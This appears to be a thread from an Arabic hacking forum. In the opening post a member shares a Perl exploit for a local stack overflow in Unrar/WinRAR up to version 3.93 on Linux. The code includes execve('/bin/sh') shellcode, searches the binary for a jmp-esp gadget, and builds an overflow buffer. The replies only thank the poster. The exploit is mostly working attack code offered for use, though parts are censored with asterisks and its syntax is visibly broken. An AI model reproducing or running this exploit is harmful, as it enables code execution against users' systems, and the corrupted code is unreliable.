1. أهلا وسهلاً بكم في :: IQ-TeaM FORUM :: .
    إذا كانت هذه الزيارة الأولى أو لديك الرغبة بالانضمام لأعضاء شبكة عراق تيم فيجب الاطلاع على خصوصية الشبكه فربما بقائك زائر افضل لك من الانضمام بحيث أن قوانين شبكة عراق تيم لا تتناسب مع اهتماماتك .
    • للأطلاع على الخصوصية وسياسة الاستخدام - التفاصيل
    • بعد الاطلاع على سياسة الموقع وقوانين شبكة عراق تيم يمكنك التسجيل معنا - تسجيل عضو جديد
    إستبعاد الملاحظة
  2. الملاحظات
    عزيزي زائر تم اطلاق الموقع الرسمي لبرنامج الاختراق Spy-Note
    إستبعاد الملاحظة
حالة الموضوع:
مغلق
  1. Mr.L4iVe
    rank
    Developer

    عضو منذ:
    ‏15 ديسمبر 2011
    عدد المشاركات:
    48
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    20
    الإقامة:
    h34rT D4t4b4s3
    نظام التشغيل:
    Linux
    سلام عليكم ورحمة الله وبركاتة ..

    كود PHP:
    #!/usr/bin/perl 
    =head1  TITLE 
      
    Winrar 
    <= v3.93 Local Stack-based Overflow exploit 
      
      
    =head2 DESCRIPTION 
      
    This script triggers a buffer overflow attack against Unrar
    the linux popular version of WinRar extractor
    It was not developped to bypass non-executing stack patches
    Have phun 
      
    =head2 AUTHORS 
      
    ZadYree 
    ~~ 3LRVS Team Low Level ********s Reversing Vxing Security 
      
      
    =head2 Tested ON 
      
    Linux Debian 6. May work on FreeBSD

      
    =
    head3 THANKS 
      
    kmkz 
    regol 
    hellpast 
    Hebiko 
    m_101 
    ZadYree 
      
    SNCF 
    The one who sent me that locked 
    .rar 
    =cut 
    use 5.010
      
    # *****code: execve("/bin/sh") => http://www.*****-storm.org/*****code/files/*****code-752.php 
    use constant *****CODE =>    "\x31\xc9\xf7\xe1\x51\x68\x2f\x2f" 
                    
    "\x73\x68\x68\x2f\x62\x69\x6e\x89" 
                    
    "\xe3\xb0\x0b\xcd\x80"
    use 
    constant BUFF => ('-' . ('3lrvs' x 820)); 
    ## 
      
      
    $p**** = "/usr/bin/unrar"
      
    die 
    "[-]File $p**** does not exist!\012" unless (-e $p****); 
      
    say "
    [*]Looking for jmp *%esp gadget..."

      
    for 
    my $line(qx{objdump -D $p**** | grep "ff e4"}) { 
        
    $esp "0" . $1last if ($line =~ m{([a-f0-9]{7}).+jmps{4}*%esp}); 

      
    say '[+]Jump to $esp found! (0x'$esp")\012[+]Now exploiting..."
    sleep(1); 
      
    my @payload = ($p****, (BUFF pack("V"hex($esp)) . *****CODE "\012")); 
      
    exec(@payload);  
    عزيزي الزائر يتوجب عليك التسجيل لمشاهدة الروابط [ تسجيل الدخول ]

     
    جاري تحميل الصفحة...
  2. خأإآلد
    DeveloPer Plus

    عضو منذ:
    ‏18 ديسمبر 2011
    عدد المشاركات:
    100
    الإعجابات المتلقاة:
    2
    نقاط الجائزة:
    50
    الإقامة:
    K.s.A
    نظام التشغيل:
    Linux
    رد: Unrar 3.9.3 Local Stack Overflow Exploit

    الله يعطيك العافيه)5:"
     
  3. нάсќɇя
    rankrank
    Developer

    عضو منذ:
    ‏17 ديسمبر 2011
    عدد المشاركات:
    52
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    20
    الإقامة:
    فيـ قلبكـ
    اللغة البرمجية:
    Ruby
    رد: Unrar 3.9.3 Local Stack Overflow Exploit

    تعيش يامبدع
    )5:"
     
  4. mxstar
    rank
    Developer

    عضو منذ:
    ‏4 فبراير 2012
    عدد المشاركات:
    21
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    5
    رد: Unrar 3.9.3 Local Stack Overflow Exploit

    شكرا لك علي هذا الموضوع
     
  5. τєғα сσđ
    rank
    ExpErt DeveloPer

    عضو منذ:
    ‏8 مارس 2012
    عدد المشاركات:
    47
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    20
    الوظيفة:
    ĿĘåяמ ҺāĆҝĕĐ
    الإقامة:
    من تراب
    رد: Unrar 3.9.3 Local Stack Overflow Exploit

    الله يعطيك العافية حبيبي
    موضوع جميل
     
حالة الموضوع:
مغلق

مشاركة هذه الصفحة

جاري تحميل الصفحة...